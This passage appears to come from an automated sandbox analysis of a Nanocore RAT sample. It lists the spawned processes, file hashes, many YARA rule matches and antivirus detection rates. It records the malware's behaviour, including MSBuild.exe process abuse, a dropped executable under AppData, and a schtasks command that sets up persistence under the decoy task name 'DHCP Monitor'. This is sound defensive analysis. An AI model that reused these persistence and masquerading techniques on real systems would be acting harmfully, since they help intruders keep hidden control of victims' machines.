        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Reputation: low

        General

        Start time: 10:32:12
        Start date: 08/04/2021
        Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Wow64 process (32bit): true
        Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Imagebase: 0xb20000
        File size: 69632 bytes
        MD5 hash: 88BBB7610152B48C2B3879473B17857E
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: .Net C# or VB.NET
        Yara matches:
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Reputation: moderate

        General

        Start time: 10:32:14
        Start date: 08/04/2021
        Path: C:\Windows\SysWOW64\schtasks.exe
        Wow64 process (32bit): true
        Commandline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Imagebase: 0x340000
        File size: 185856 bytes
        MD5 hash: 15FF7D8324231381BAD48A052F85DF04
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Reputation: high

        General

        Start time: 10:32:14
        Start date: 08/04/2021
        Path: C:\Windows\System32\conhost.exe
        Wow64 process (32bit): false
        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase: 0x7ff774ee0000
        File size: 625664 bytes
        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Reputation: high

        General

        Start time: 10:32:15
        Start date: 08/04/2021
        Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Wow64 process (32bit): true
        Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
        Imagebase: 0x950000
        File size: 69632 bytes
        MD5 hash: 88BBB7610152B48C2B3879473B17857E
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: .Net C# or VB.NET
        Reputation: moderate

        General

        Start time: 10:32:15
        Start date: 08/04/2021
        Path: C:\Windows\System32\conhost.exe
        Wow64 process (32bit): false
        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase: 0x7ff774ee0000
        File size: 625664 bytes
        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Reputation: high

        General

        Start time: 10:32:23
        Start date: 08/04/2021
        Path: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        Wow64 process (32bit): true
        Commandline: 'C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe'
        Imagebase: 0xd50000
        File size: 1253382 bytes
        MD5 hash: 206B9BA9B804BD72DB71AEBAB5967567
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 55%, Virustotal
        • Detection: 48%, ReversingLabs
        Reputation: low

        General

        Start time: 10:32:28
        Start date: 08/04/2021
        Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Wow64 process (32bit): true
        Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Imagebase: 0xf60000
        File size: 69632 bytes
        MD5 hash: 88BBB7610152B48C2B3879473B17857E
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: .Net C# or VB.NET
        Yara matches:
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.287492907.0000000003581000.00000004.00000001.sdmp, Author: Joe Security
        Reputation: moderate

        Disassembly

        Code Analysis
